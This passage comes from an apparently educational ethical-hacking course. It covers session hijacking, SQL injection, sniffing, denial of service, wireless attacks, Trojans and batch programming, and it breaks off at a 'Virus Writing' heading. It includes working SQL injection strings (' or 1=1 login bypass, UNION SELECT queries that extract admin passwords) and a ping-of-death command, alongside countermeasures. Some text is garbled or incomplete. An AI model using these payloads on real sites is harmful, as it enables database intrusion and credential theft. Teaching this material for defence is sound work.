sniffing, to capture the authentication between a client and server, to hijacking the established
session to trick the server into thinking it has a legitimate session with the server.
Session Hijacking Steps
To successfully hijack a session, several items must come into place.
The attacker must be able to track and intercept the traffic
The attacker must be able to desynchronize the connection
The attacker must be able to inject his traffic in place of the victim‘s
If successful, the attacker can then simply sit back and observe or actively take over the
connection.
Passive Session Hijacking – The process of silently sniffing the data exchange between the user
and server.
Active Session Hijacking – The process of killing the victim‘s connection and hijacking it for
malicious intent.
TCP Concepts
To understand hijacking, you must know how TCP functions. As TCP is a reliable service, a 3-
step startup is performed before data is transported.
TCP 3-step startup
Before two computers can communicate, TCP must set up the session. This setup is comprised of
three steps. Once these three steps are completed, the two computers can exchange data. The 3-
step startup is shown below:
Client -- SYN - Server
Client - SYN / ACK -- Server
Client -- ACK - Server
Sequence Numbers
During the first two steps of the three-step startup, the two computers that are going to
communicate exchange sequence numbers. These numbers enable each computer to keep track of
how much information has been sent and the order in which the packets must be reassembled. An
attacker must successfully guess the sequence number to hijack the session.
Session Hijacking Tools
There are many tools available to hijack a session. Some of these tools include:
Juggernaut
Hunt
SolarWinds
TCP Session Reset Utility
Session Hijacking Countermeasures
Session hijacking is not one of the easiest attacks for an attacker to complete. It can, however,
have disastrous results for the victim if successful. Organizations should consider replacing clear
text protocols, such as FTP and Telnet, with more secure protocols such as SSH. Also,
administrative controls such as time stamps, sequence numbers, and digital signatures can be
used to prevent anti-replay attacks.
SQL Injection
Some organizations are so focused on their web servers, that they may never realize that the
attacker may have another target in mind. The organization‘s most valuable assets are not on the
web server, but contained within the company‘s database. This juicy target can contain customer
data, credit card numbers, passwords, or other corporate secrets. Attackers search for and exploit
databases that are susceptible to SQL injection. SQL injection occurs when an attacker is able
to insert SQL statements into a query by means of a SQL injection vulnerability.
SQL injection as the name suggest is a type of security attack in which the attacker (injects) inputs
specially crafted Structured Query Language (SQL) code through a web browser to gain access
to resources, or make changes the data. It is a technique of injecting SQL commands to exploit
non-validated input loopholes in a web application database. Programmers use sequential
commands with user input, making it easier for attackers to inject commands at a very fast speed
and accuracy. It also takes advantage of unsafe queries in web applications and builds dynamic
SQL queries.
SQL Insertion Discovery
Attackers typically scan for port 1433 to find Microsoft SQL databases. Once identified, the
attacker will place a single ‗inside a username field to test for SQL vulnerabilities. The attacker
will look for a return result similar to the one shown below:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ‗ and Password=''./login.asp, line 42
This informs the attacker that SQL injection is possible. At this point, the attacker can shut down
the server, execute commands, extract the database, or do just about anything else he wants to
do.
SQL Injection Vulnerabilities
SQL servers are vulnerable because of poor coding practices, lack of input validation, and the
failure to update and patch the service. The two primary vulnerabilities are:
Unpatched Systems
Blank sa Password
Steps for performing SQL Injection
Now the most common question that arises in the mind is what tool would one require to take out a
SQL Attack. And the answer is quite simple :
Any web browser would be good enough for a SQL attack.
How to do a SQL attack?
First of all we should look for pages that allow user to submit data, like login page, search page,
feedback, etc. If we have a HTML page we should check the source code for whether it is using
POST or GET, look for the <Form> tag in the source code
<Form action=search.asp method=post>
<input type=hidden name=X value=Z>
</Form>
If not, check for pages like ASP, JSP, CGI, or PHP
Example:
Check the URL that takes the following parameters:
http:// www.xsecurity.com /index.asp?id=10
In the above example, attackers might attempt:
http://www.xsecurity.com/index.asp?id=blah‘ or 1=1—
SQL Injection Techniques
In SQL Injection, the hacker uses SQL queries and creativity to get to the database of sensitive
corporate data through the web application. SQL or Structured Query Language is the computer
language that allows you to store, manipulate, and retrieve data stored in a relational database
(or a collection of tables which organize and structure data). SQL is, in fact, the only way that a
web application (and users) can interact with the database. Examples of relational databases
include Oracle, Microsoft Access, MS SQL Server, MySQL, and Filemaker Pro, all of which
use SQL as their basic building blocks.
SQL commands include SELECT, INSERT, DELETE and DROP TABLE. DROP TABLE is
as ominous as it sounds and in fact will eliminate the table with a particular name.
In the legitimate scenario of the login page example above, the SQL commands planned for the
web application may look like the following:
SELECT count(*)
FROM users_list_table
WHERE username=‘FIELD_USERNAME‘
AND password=‘FIELD_PASSWORD‖
In plain English, this SQL command (from the web application) instructs the database to match the
username and password input by the legitimate user to the combination it has already stored. Each
type of web application is hard coded with specific SQL queries that it will execute when
performing its legitimate functions and communicating with the database. If any input field of the
web application is not properly sanitized, a hacker may inject additional SQL commands that
broaden the range of SQL commands the web application will execute, thus going beyond the
original intended design and function. A hacker will thus have a clear channel of communication
(or, in layman terms, a tunnel) to the database irrespective of all the intrusion detection systems and
network security equipment installed before the physical database server. To test a site for SQL
attack. Use a single quote in the input:
blah‘ or 1=1—
Login:blah‘ or 1=1—blah 1 1
Password:blah‘ or 1=1—
The next big thing is :How to retrieve data any DataTo get the login_name from the―admin
login‖ table
http:// xsecurity.com /index.asp?id=10 UNION SELECT TOP 1 login_name FROM
admin_login--
From above, you get login_name of the admin_user. To get the password for login name=―yuri‖
http‖// xsecurity.com /index.asp?id=10 UNION SELECT TOP 1 password FROM
admin_login where login_name=‗yuri‘--
Tools for SQL Injection
Wpoison
Pearlscript
SQLDict
SqlExec
SQLbf
SQLSmack
SQL2.exe
AppDetective
Database Scanner
SQLPoke
NGSSQuirreL
SQLPing v2.2
Preventing SQL Injection
Preventing SQL injection is best achieved through the techniques discussed above. You should
also make sure that the application is running with only enough rights to do its job and implements
error handling, so that when the system detects an error, it will not provide the attacker with any
useable information.
SQL Injection in Oracle
UNIONS can be added to the existing statement to execute a second statement
SUBSELECTS can be added to existing statements
Data Definition Language (DDL) can be injected if DDL is used in a dynamic SQL string
INSERTS, UPDATES, and DELETES can also be injected
Anonymous PL/SQL block in procedures
SQL Injection in MySql
It is not easy to perform SQL injection in a MySql database. While coding with a MySql
application, the injection vulnerability is not exploited. It is difficult to trace the output. You can
see an error because the value retrieved is passed on to multiple queries with different numbers of
columns before the script ends.In such situations, SELECT and UNION commands cannot be
used.
8. NETWORK ATTACKS
Sniffers
A sniffer or packet analyzer can be software or hardware based. Its function is to capture and
decode network traffic. Sniffers typically place the NIC into promiscuous mode. Captured
traffic can be analyzed to determine problems in a network such as bottlenecks or performance
degradation. Sniffers can also be used by an attacker or unauthorized individual to capture clear
text passwords and data from the network. Protocols such as FTP, Telnet, and HTTP are
especially vulnerable as they pass all usernames and passwords in clear text.
Passive Sniffing
Passive sniffing is made possible through the use of hubs. As hubs treat all ports as one giant
collision domain, all traffic is visible. Unfortunately for the attacker, most modern networks no
longer use hubs. This makes the capture of unauthorized traffic more difficult. That is unless the
attacker is sniffing a wireless network as it acts as a hub, not a switch.
Active Sniffing
Switches do not operate like hubs. By default, they make each physical port a separate collision
domain. Therefore, active sniffing requires that the switch be manipulated in some fashion. The
objective is to force the switch to pass the attacker the needed traffic. Otherwise, the attacker
will only see the traffic bound for his particular port or broadcast traffic, which by default, is
passed to all ports.
Generic Sniffing Tools
These tools allow you to view real-time packet captures and configure filters for pre/post filtering.
Once the data is captured, these programs allow you to interactively view each packet and its
individual headers. Descriptions of the packet headers are summarized. Most will also allow you
to reconstruct individual TCP streams. Some of these programs are freely available, while others
are quite expensive.
WinDump – A Windows based command line TCPDump program
TCPDump – The most well-known Unix based sniffing program
Ethereal – A great GUI TCP/IP sniffer. It is free and available at
http://www.ethereal.com
EtherPeek – A commercial grade sniffer developed by WildPackets
Specialized Sniffing Tools
Unlike the generic tools listed above, these tools capture specific types of traffic. These are
optimized for hacking and penetration testing as all the non-essential information has been
removed.
DSniff – Captures clear text usernames and passwords.
Mailsnarf - Optimized to capture clear text mail information.
URLsnarf – Builds a list of all browsed URLS.
Webspy – Opens the URL the victim is browsing on the attacker‘s computer
Cain – Sniff traffic, capture/crack passwords, and enumerate Windows networks.
Ettercap – multipurpose sniffer/interceptor/logger for switched LAN‘s.
Overcoming Switched Networks
Sniffing traffic on a switched network can be accomplished through one of two ways: Flooding or
ARP Spoofing.
Flooding
Flooding is simply the process of sending the switch more MAC addresses than the CAM
(Content Addressable Memory) can hold. Some, but not all switches that are flooded with such a
high amount of traffic will default open. Simply stated, these devices will begin to function as a
hub passing all traffic to all ports. One of the programs an attacker may use to attempt to
accomplish this technique is EtherFlood.
ARP Spoofing
This technique corrupts the ARP protocol to attempt the redirection of switched traffic. Normally,
ARP is used to resolve known IP addresses to unknown MAC addresses. Once the ARP
protocol has performed this resolution, the results are stored in the ARP cache. It is stored there
for a short period of time to speed consequent communications and reduce broadcast traffic. Since
ARP is a trusting protocol, a victim‘s computer will accept an unsolicited ARP response. This
unsolicited ARP response can be used to fool the victim‘s computer into communicating with the
wrong device. For the attacker to be successful, he must also fool the switch and enable IP
forwarding to move the data from his computer, to its true destination. At this point, he will have
successfully placed himself in the traffic stream and can capture all forthcoming data
transmissions. Several programs are available that can accomplish this attack. One such program
is
MAC Spoofing
MAC spoofing tools allow the attacker to pretend to be another physical device. This type of
attack may be used in situations where switch ports are locked by MAC address. These tools are
available for Windows and Linux. Some can even be used to spoof wireless network cards.
Macof – Floods the network with random MAC addresses
SMAC – Windows MAC address spoofing tool
MAC Changer – Linux MAC address spoofing tool
DNS Spoofing
DNS spoofing is a hacking technique used to inject DNS servers with false information. It enables
malicious users, redirects users to bogus websites, or can be used for denial of service attacks. A
good understanding of DNS and zone files are required to pass the CEH exam. Zone files contain
SOA, NS, A, CNAME, and MX records. Other DNS record types include: PTR, HINFO, and
MINFO. The two basic approaches to DNS spoofing are:
Hijack the DNS query and redirect the victim to a bogus site
Hack the DNS server, thereby, forcing it to provide a false response to a DNS query
Two of the tools available to the attacker to perform DNS spoofing are:
WinDNSSpoof
Distributed DNS Flooder
Detecting Sniffers and Monitoring Traffic
It is not easy to detect sniffers on the network. Organizations should make sure their policies
disallow unauthorized sniffers. There should also be a heavy penalty placed on those found to be
in violation of such policies. There are some tools that can aid the network security administrator
in maintaining compliance to this policy, such as, SniffDet, IRIS and NetIntercept.
Denial of Service (DOS)
A DoS attack is any type of attack that brings a system offline or otherwise makes a host's service
unavailable to legitimate users. Early DoS attacks were often described as annoying, frustrating,
or a nuisance. Modern DoS attacks have increased in sophistication and can render a network
unusable. These attacks can cost corporations money through lost sales and profits. While it may
be difficult to place an exact monetary figure on DoS attacks, they are costly.
DOS Attacks or Denial Of Services Attack have become very common amongst Hackers who use
them as a path to fame and respect in the underground groups of the Internet. Denial of Service
Attacks basically means denying valid Internet and Network users from using the services of
the target network or server. It basically means, launching an attack, which will temporarily
make the services, offered by the Network unusable by legitimate users. In others words one can
describe a DOS attack, saying that a DOS attack is one in which you clog up so much memory on
the target system that it cannot serve legitimate users. Or you send the target system data
packets, which cannot be handled by it and thus causes it to either crash, reboot or more
commonly deny services to legitimate users.
Common DoS Attacks
Popular DoS attacks can be separated into three categories:
Bandwidth
Protocol
Logic
Common DoS Attack Strategies
No matter the type, the end result is the same, loss of service for the legitimate users. Some of the
more common DoS attack strategies are: Ping of Death, SSPing, Land, Smurf, SYN Flood, Win
Nuke, Jolt2, Bubonic, Targa, and Teardrop.
Common DDoS(Distributed DoS) Attacks
DDoS software has matured beyond the point where it can only be used by the advanced attacker.
The most powerful DDoS programs are open source code. While these programs reside in the
virtual space of the Internet, programmers tweak them, improve them, and add features to each
successive iteration. Some common DdoS Attack strategies are:
Trin00 1, TFN, TFN2K, Stacheldraht, Shaft and Mstream.
DDoS Attack Sequence
DDoS attacks follow a two-prong attack sequence:
Mass Intrusion
Attack Phase
DOS Attacks are of the following different types-:
Those that exploit vulnerabilities in the TCP/IP protocols suite.
Those that exploit vulnerabilities in the Ipv4 implementation.
There are also some brute force attacks, which try to use up all resources of the target
system and make the services unusable.
Some common vulnerabilities in TCP/IP are Ping of Death, Teardrop, SYN attacks and Land
Attacks.
Ping of Death
This vulnerability is quite well known and was earlier commonly used to hang remote systems (or
even force them to reboot) so that no users can use its services. This exploit no longer works, as
almost all system administrators would have upgraded their systems making them safe from such
attacks. In this attack, the target system is pinged with a data packet that exceeds the maximum
bytes allowed by TCP/IP, which is 65 536. This would have almost always caused the remote
system to hang, reboot or crash. This DOS attack could be carried out even through the command
line, in the following manner:
The following Ping command creates a giant datagram of the size 65540 for Ping. It might hang the
victim's computer:
C:\windows>ping -l 65540
Teardrop
The Teardrop attack exploits the vulnerability present in the reassembling of data packets.
Whenever data is being sent over the Internet, it is broken down into smaller fragments at the
source system and put together at the destination system. Say you need to send 4000 bytes of data
from one system to the other, then not all of the 4000 bytes is sent at one go. This entire chunk of
data is first broken down into smaller parts and divided into a number of packets, with each packet
carrying a specified range of data. For Example, say 4000 bytes is divided into 3 packets,
then:
The first Packet will carry data from 1 byte to 1500 bytes
The second Packet will carry data from 1501 bytes to 3000 bytes
The third packet will carry data from 3001 bytes to 4000 bytes
These packets have an OFFSET field in their TCP header part. This Offset field specifies from
which byte to which byte does that particular data packet carries data or the range of data that
it is carrying. This along with the sequence
numbers helps the destination system to reassemble the data packets in the correct order. Now in
this attack, a series of data packets are sent to the target system with overlapping Offset field
values. As a result, the target system is not able to reassemble the packets and is forced to crash,
hang or reboot.
Say for example, consider the following scenario-: (Note: _ _ _ = 1 Data Packet)
Normally a system receives data packets in the following form, with no overlapping Offset values.
_ _ _ _ _ _ _ _ _
(1 to 1500 bytes) (1501 to 3000 bytes) (3001 to 4500 bytes)
Now in a Teardrop attack, the data packets are sent to the target computer in the following format:
_ _ _ _ _ _ _ _ _
(1 to 1500 bytes) (1500 to 3000 bytes) (1001 to 3600 bytes)
When the target system receives something like the above, it simply cannot handle it and will crash
or hang or reboot.
SYN Attack
The SYN attack exploits TCP/IP's three-way handshake. Thus in order to understand as to how
SYN Attacks work, you need to first know how TCP/IP establishes a connection between two
systems. Whenever a client wants to establish a connection with a host, then three steps take place.
These three steps are referred to as the three-way handshake.
In a normal three way handshake, what happens is that, the client sends a SYN packet to the
host, the host replies to this packet with a SYN ACK packet. Then the client responds with a
ACK (Acknowledgement) packet. This will be clearer after the following depiction of these
steps-:
1. Client --------SYN Packet--------------‡Host
In the first step the client sends a SYN packet to the host, with whom it wants to establish a three-
way connection. The SYN packet requests the remote system for a connection. It also contains the
Initial Sequence Number or ISN of the client, which is needed by the host to put back the
fragmented data in the correct sequence.
2. Host -------------SYN/ACK Packet----------‡Client
In the second step, the host replies to the client with a SYN/ACK packet. This packet
acknowledges the SYN packet sent by the client and sends the client its own ISN.
3. Client --------------ACK-----------------------‡Host
In the last step the client acknowledges the SYN/ACK packet sent by the host by replying with a
ACK packet. These three steps together are known as the 3-way handshake and only when they are
completed is a complete TCP/IP connection established.
In a SYN attack, several SYN packets are sent to the server but all these SYN packets have a bad
source IP Address. When the target system receives these SYN Packets with Bad IP Addresses, it
tries to respond to each one of the with a SYN ACK packet. Now the target system waits for an
ACK message to come from the bad IP address. However, as the bad IP does not actually exist, the
target system never actually receives the ACK packet. It thus queues up all these requests until it
receives an ACK message. The requests are not removed unless and until, the remote target system
gets an ACK message. Hence these requests take up or occupy valuable resources of the target
machine. To actually affect the target system, a large number of SYN bad IP packets have to be
sent. As these packets have a Bad Source IP, they queue up, use up resources and memory or the
target system and eventually crash, hang or reboot the system.
Land Attacks
A Land attack is similar to a SYN attack, the only difference being that instead of a bad IP
Address, the IP address of the target system itself is used. This creates an infinite loop
between the target system and the target system itself. However, almost all systems have filters
or firewalls against such attacks.
Smurf Attacks
A Smurf attack is a sort of Brute Force DOS Attack, in which a huge number of Ping Requests
are sent to a system (normally the router) in the Target Network, using Spoofed IP Addresses
from within the target network. As and when the router gets a PING message, it will route it or
echo it back, in turn flooding the Network with Packets, and jamming the traffic. If there are a large
number of nodes, hosts etc in the Network, then it can easily clog the entire network and prevent
any use of the services provided by it. Read more about the Smurf Attacks at CERT:
http://www.cert.org/advisories/CA-98.01.smurf.html
UDP Flooding
This kind of flooding is done against two target systems and can be used to stop the services
offered by any of the two systems. Both of the target systems are connected to each other, one
generating a series of characters for each packet received or in other words, requesting UDP
character generating service while the other system, echoes all characters it receives. This creates
an infinite non-stopping loop between the two systems, making them useless for any data
exchange or service provision.
Distributed DOS Attacks
DOS attacks are not new; in fact they have been around for a long time. However there has been a
recent wave of Distributed Denial of Services attacks which pose a great threat to Security
and are on the verge of overtaking Viruses/Trojans to become the deadliest threat to Internet
Security. Now you see, in almost all of the above TCP/IP vulnerabilities, which are being
exploited by hackers, there is a huge chance of the target's system administrator or the authorities
tracing the attacks and getting hold of the attacker. Now what is commonly being done is, say a
group of 5 Hackers join and decide to bring a Fortune 500 company's server down. Now each one
of them breaks into a smaller less protected network and takes over it. So now they have 5
networks and supposing there are around 20 systems in each network, it gives these Hackers,
around 100 systems in all to attack from. So they sitting on there home computer, connect to the
hacked less protected Network, install a Denial of Service Tool on these hacked networks and
using these hacked systems in the various networks launch Attacks on the actual Fortune 500
Company. This makes the hackers less easy to detect and helps them to do what they wanted to do
without getting caught. As they have full control over the smaller less protected network they can
easily remove all traces before the authorities get there. Not even a single system connected to the
Internet is safe from such DDOS attacks. All platforms including UNIX, Windows NT are
vulnerable to such attacks. Even MacOS has not been spared, as some of them are being used
to conduct such DDOS attacks.
Preventing DoS Attacks
No solution provides complete protection against the threat of DoS attacks. However, there are
things you can do to minimize the effect of a DoS attack. These include:
Practice the principle of Least Privilege
Limit bandwidth
Configure aggressive ingress and egress filtering
Keep computers up to date and patched
Implement load balancing
Implement IDS
DoS Scanning Tools
If you believe that your computer may have been compromised, the best practice is to use a
scanning tool to check for DoS infestation. There are several tools to help with this task. Some of
these include: Find_ddos, SARA, DdoSPing, RID and Zombie Zapper.
9. WIRELESS HACKING
Introduction –Wireless Networking
Wireless networking technology is becoming increasingly popular and at the same time has
introduced several security issues.
The popularity of wireless technology is driven by two primary
Convenience
Cost
A wireless local area network (WLAN) allows workers to access digital resources without being
locked to their desks.
Laptops can be carried into meetings or even in to a star bucks café tapping in to a wireless
network. this convenience has become affordable.
Business and Wireless Attacks
Business is at high risk from wireless hackers who don‘t need any physical entry into the
business network to hack. but can easily compromise the network with the help of freely
available tools.
War driving, war chalking, warflying are some of the ways that a wireless hacker can
access the vulnerability of the firms network.
Components of a Wireless Network
Wi-Fi Radio devices
Access points
Gateways
Types of Wireless Network
Four basic types
Peer to peer
Extension to a wired network
Multiple access points
LAN to LAN Wireless network
Setting up WLAN
When setting up a WLAN, the channel and service set identifier (SSID) must be
configured in addition to traditional network setting such as IP address and a subnet
mask.
The channel is a number between 1 and 11 and designates the frequency on which the
network will operate.
The SSID is an alphanumeric string that differentiates networks operating on the same
channel.
It is essentially a configurable name that identifies and individual network. These setting
are important factors when identifying WLANs and sniffing traffic.
SSID (Service Set Identifier)
The SSID is a unique identifier that wireless networking devices use to establish and maintain
wireless connectivity.
SSIDs act as a single shared password between access points and clients.
Security concerns arise when the default values are not changed. As these units can be
easily compromised.
What is Wired Equivalent Privacy (WEP)
WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to
provide for confidentiality of date on wireless networks at a level equivalent to that
Of wired LANs.
Wired LANs typically employ physical controls to prevent unauthorized users from
Connecting to the network and viewing data. In a wireless LAN can be access without
Physically connecting to the LAN.
IEEE choose to employ encryption at the data link layer to prevent unauthorized
Eavesdropping on a network .this is accomplished by encrypting data with the RC4
Encryption algorithm.
Denial-of-Service attacks
Wireless LANs are susceptible to the same protocol based attacks that plague wired
WLANs send information via radio waves on public frequencies, thus they are
susceptible to inadvertent interference from traffic from the same radio band.
Various types of Dos attacks:
-Physical layer
-Data- link layer
-Network layer
Man-In-The-Middle-Attack (MITM)
Eavesdropping -Happens when an attacker receives a data communication stream.
-Not using security mechanism such as IPsec, SSH or SSL makes the data vulnerable to
an
Unauthorized user.
Manipulation -an extended step of eavesdropping.
-can be done ARP Poisoning.
Hacking Wireless Networks
Wireless networking technologies become more popular each day. The reasons are simple;
wireless networks are easy to configure, easy to use, require no cabling and are inexpensive.
802.11 Standards
The IEEE 802.11 committee sets the standards for the wireless protocol. The three wireless
standards include:
802.11 a – Speeds up to 54 Mbps
802.11 b – Speeds up to 11 Mbps
802.11 g – Speeds up to 54 Mbps
WEP
WEP (Wired Equivalent Privacy) was originally designed to protect wireless networks from
eavesdropping through the use of a 40-bit key. The key was limited to 40 bits, due to export rules
that existed during the late 1990s when the 802.11 protocol was developed. This provides a very
limited level of encryption that is relatively easy to compromise. WEP is vulnerable because it uses
a relatively short IV (Initialization Vector) and key remains static. Luckily, there are protection
mechanisms that make wireless more secure. These include:
WPA – Wireless Protection Access, a replacement for WEP
LEAP – Cisco's Lightweight Extensible Authentication Protocol
PEAP – Protected Extensible Authentication Protocol
Finding WLANs
Finding unsecured wireless networks has become quite a fad; some criminal hackers are making a
game of driving around and connecting to as many networks as they can. One of the most well-
known tools for finding WLANs is NetStumbler.
Cracking WEP Keys
Because of the weaknesses of WEP, locked networks can be accessed as long as enough packets
can be captured. Two tools used to break into WEP secured networks are AirSnort and WEP
Crack.
Sniffing Traffic
Just as in the wired world, there are tools that can be used to capture and sniff wireless traffic.
They include AiroPeek and Kismet.
Wireless Attacks
Wireless networks can be attacked by several different methods. The two most common are:
Wireless Dos and Access Point Spoofing.
Securing Wireless Networks
Fortunately, there are ways to secure wireless networks. A good starting point is to turn on WEP
and change the SSID(Service Set Identifier). Changing the SSID and enabling WEP is only the
first step, since it is still transmitted in clear text. You should continue by carefully considering the
placement of your WAPs and restricting the allocation of DHCP addresses on the wireless network
segment. Other considerations include:
Prohibit access from unknown MAC addresses
Use Strong Authentication such as RADIUS
Consider IPSec
Build a network that maintains defense in depth
10. TROJANS & BACKDOORS
Trojan horses are programs that are malicious in nature but are disguised as benign. Once
executed, they plant unwanted malicious code on the user‘s computer. These programs can, among
other things, steal passwords, provide remote access, log keystroke activity, or destroy data.
Trojans are nothing but remote administration tools (RATs) that provide attackers with remote
control and remote access to the victim system. in other words, once a system has been infected
with a Trojan, an attacker can remotely control almost all hardware and software on it. Modern day
Trojans have come extremely advanced and provide attackers with a variety of different
sophisticated features for remote control. Once a Trojan has been installed on a system then not
only is all its data under threat, but also there is a high possibility wherein the compromised system
may be misused to initiate an attack on some third- party system.
Trojans are clearly extremely dangerous tools that are capable of doing a lot of harm to the victim
system. Some of the most common malicious activities that can be conducted with the help of
Trojans are as follows:
Trojans are most commonly used by attackers to steal sensitive IP data from the
victim corporations.
A number of Trojans have inbuilt logging capabilities.
Almost all Trojans can also be used for purely malicious purpose.
Attackers often use Trojans to exploit the resources of your system (and network) to
execute attack on pre-defined victim systems.
What is a Trojan Horse?
The story of the Trojan Horse comes from the classic novel, The Iliad, where the Trojans placed
the gift of a tall wooden horse at the city gates. The city inhabitants accepted the gift and moved it
inside. Then, during the middle of the night, soldiers who were hiding inside the horse slipped out
and attacked the city‘s inhabitants. Trojan programs, just as with the historical version, require
the user to accept the malicious gift. Once executed, the system is infected. Therefore, the best
defense is to make sure users are trained not to download or install unsolicited applications.
Working
The working of Trojans is quite easy to understand and using them requires almost no technical
knowledge. Most Trojans are made up of the two main parts:
1. The Server part: it has installed on the victim‘s system through trickery or disguise.
2. The Client part: it is installed on the attacker‘s system and is then used to connect to
the server part of the Trojan installed on the victim‘s system.
An attacker can carry out a Trojan attack on the target system by following the simple given
steps:
1. The first step of an attacker‘s is to find a way to install the server part of the Trojan
on the target system. This is probably one of the difficult steps in Trojan attack. Some
of most common ways which one can do this is as follows:
Autorun CD-ROMs
Instant Messengers
Physical access
EXE Binders
2. Once the server part of the Trojan is installed on the victim‘s system, it then binds
itself to a particular port on the target system and listens for connections. Each Trojan
listens for connections on a pre-defined specific port number. For example, the
Netbus Trojan listens for connections on the predefined port 12345.
3. Next the attacker needs to somehow find out IP address of the target system on which
the server part of the Trojan has been installed.
4. Finally, the attacker uses the client part of the Trojan tool (installed on his system) to
connect to the server part installed on the target system.
5. On most occasions, after compromising the target system with a Trojan, attackers
install a backdoor on it. So that the next time they want access to the same system, the
above cumbersome process need not be executed all over again.
Common Trojans and Backdoors
The most common Trojans, allow the attacker remote access to the victim's computer. Various
means are used to trick the user into installing the program. Once installed, the attacker can use the
Trojan to have complete access to that computer, just as if he were physically sitting in front of its
keyboard. Common ways Trojans are acquired include e-mail attachments, untrusted sites, peer-to-
peer programs (i.e., Kazaa), or Instant Messenger downloads. Several of the most well-known
Trojans are: BackOrifice 2000, QAZ, Tini, Donald Dick, SubSeven, NetBus, Beast and Netcat.
Wrappers
Wrappers are programs that are used to combine Trojan programs with legitimate programs.
This combined, wrapped executable is then forwarded to the victim. The victim sees only the one,
legitimate program and upon installation, is tricked into installing the Trojan. Not all of these
programs will give the attacker the icon he needs to trick the victim into executing the program.
So, tools such as Michelangelo or IconPlus will be used to alter the installation icon. It can be
made to look like anything from a Microsoft Office 2000 icon, to a setup icon for the latest
computer game.
Covert Channels
Covert channels rely on the principle that you cannot deny what you must permit. Therefore, if
protocols such as HTTP, ICMP, and DNS are allowed through the firewall, these malicious
programs will utilize those openings. Three of the top covert channel programs are listed below:
ACK CMD - Uses TCP ACK‘s as a covert channel
Loki – Uses ICMP as a covert channel
Reverse WWW Shell – Uses HTTP as a covert channel
Backdoor Countermeasures
The cheapest countermeasure to implement is that of educating users not to download and install
applications from e-mail or the Internet. Anti-virus software must also be installed and kept
current. Outdated anti-virus software is of little to no value. If you suspect a computer has become
infected with a Trojan or backdoor:
use a port-monitoring tool to investigate running processes and applications and,
install a cleaner to remove the malicious software.
Port Monitoring Tools
The tools listed below are one quick and simple way to investigate the programs and processes
running on a computer. Even without the add-on tools listed below, you can still get a good look at
running processes and applications by using the GUI Task Manager. Another built-in port activity
tool that is command line based is Netstat. Fortunately, there are lots of good port monitoring tools
available to monitor programs and processes. Several of these are: Fport, TCPView, Process
Viewer and Inzider.
System File Verification
Whenever Trojans are discovered, you will need to thoroughly investigate the amount of damage
that has been done. Remember that the three basic tenets of security are confidentiality, integrity,
and availability. One or more of these most likely has been violated. If you are no longer sure of
the integrity of the file system, you will be required to reinstall from a known, good backup media.
There are other ways to verify the integrity of the system. These include: WFP (Windows File
Protection), MD5SUM and TripWire.
11. BATCH PROGRAMMING & VIRUS CODING
Viruses
A computer virus is nothing more than a malicious program that is capable of duplicating itself
solely for the purpose of causing damage. Viruses do not spontaneously execute on one‘s
computer; they must be given control via an overt act, such as clicking on an executable file
attached to an email message; or via an implicit permission that allows your software (IE for
example) to automatically execute certain kinds of programs (or scripts). Typically, when a virus
gets control it copies itself into other files on one‘s system and then tries to hitch a ride via email or
other network-based means to other computers. Viruses can only spread by infecting other
objects like programs, files, documents, or e-mail attachments. If a virus fails to infect a file or
program, it cannot spread. Some well-known viruses that have destroyed data and infected
computer systems include: Cherobyl, ExploreZip, I Love You and Melissa.
Unlike a virus, a worm is a self-propagating program. Worms copy themselves from one
computer to another, often without the user‘s knowledge. Some well-known worms that have
destroyed data and infected computer systems include: Pretty Park Worm, Code Red Worm,
W32/Klex Worm, BugBear Worm, W32/Opas erv Worm, SQL Slammer Worm, Code Red
Worm, MS Blaster and Nimda Worm.
Batch Programming
Batch file programming is nothing but the Windows version of Unix Shell programming. Let's
start by understanding what happens when we give a DOS command. DOS is basically a file
called command.com. It is this file (command.com) which handles all DOS commands that you
give at the DOS prompt---such as COPY, DIR, DEL etc. These commands are built in with the
Command.com file. (Such commands which are built in are called internal commands).DOS
has something called external commands too such as FORMAT, UNDELETE, BACKUP etc.
So whenever we give a DOS command either internal or external, command.com either
straightaway executes the command (Internal Commands) or calls an external separate
program which executes the command for it and returns the result (External Commands).
Why do we need Batch File Programs?
Say you need to execute a set of commands over and over again to perform a routine task like
Backing up Important Files, Deleting temporary files(*.tmp, .bak , ~.* etc) then it is very difficult
to type the same set of commands over and over again. To perform a bulk set of same commands
over and over again, Batch files are used. Batch Files are to DOS what Macros are to Microsoft
Office and are used to perform an automated predefined set of tasks over and over again.
How to create batch files?
Batch files are basically plain text files containing DOS commands. So the best editor to write your
commands in would be Notepad or the DOS Editor (EDIT) All you need to remember is that a
batch file should have the extension .BAT(dot bat)Executing a batch file is quite simple too. For
example if you create a Batch file and save it with the filename batch.bat then all you need to
execute the batch file is to type:
C:\windows>batch.bat
What happens when you give a Batch file to the command.com to execute?
Whenever command.com comes across a batch file program, it goes into batch mode. In the batch
mode, it reads the commands from the batch file line by line. So basically what happens is,
command.com opens the batch file and reads the first line, then it closes the batch file. It then
executes the command and again reopens the batch file and reads the next line from it. Batch files
are treated as Internal DOS commands.
Note
While creating a batch file, one thing that you need to keep in mind is that the filename of the batch
file should not use the same name as a DOS command. For example, if you create a batch file by
the name dir.bat and then try to execute it at the prompt, nothing will happen. This is because when
command.com comes across a command, it first checks to see if it is an internal command. If it is
not then command.com checks if it a .COM, .EXE or .BAT file with a matching filename. All
external DOS commands use either a .COM or a .EXE extension, DOS never bothers to check if
the batch program exits.
First take up a simple batch file which executes or launches a .EXE program. Simply type the
following in a blank text file and save it with a .BAT extension.
C: cd windows telnet Now let's analyze the code, the first line tells command.com to go to the C: Next it tells it to change
the current directory to Windows. The last line tells it to launch the telnet client. You may
contradict saying that the full filename is telnet.exe. Yes you are right, but the .exe extension is
automatically added by command.com. Normally we do not need to change the drive and the
directory as the Windows directory is the default DOS folder. So instead the bath file could simply
contain
the below and would still work.
Launch command.com (DOS) and execute the batch file by typing:
C:\WINDOWS>batch_file_name
You would get the following result:
C:\WINDOWS>scandisk
And Scandisk is launched. So now the you know the basic functioning of Batch files.
Let's move on to Batch file commands
The REM Command-
The simplest basic Batch file command is the REM or the Remark command. It is used
extensively by programmers to insert comments into their code to make it more readable
and understandable. This command ignores anything there is on that line. Anything on
the line after REM is not even displayed on the screen during execution. ECHO: The Batch Printing Tool-
The ECHO command is used for what the Print command is in other programming
languages: To Display something on the screen. It can be used to tell the user what the
bath file is currently doing.
We can prevent a particular command from being shown but still be executed by
preceding the command with a @ sign.
The EXIT command- Ends your batch file.
Virus Writing
Types of Viruses
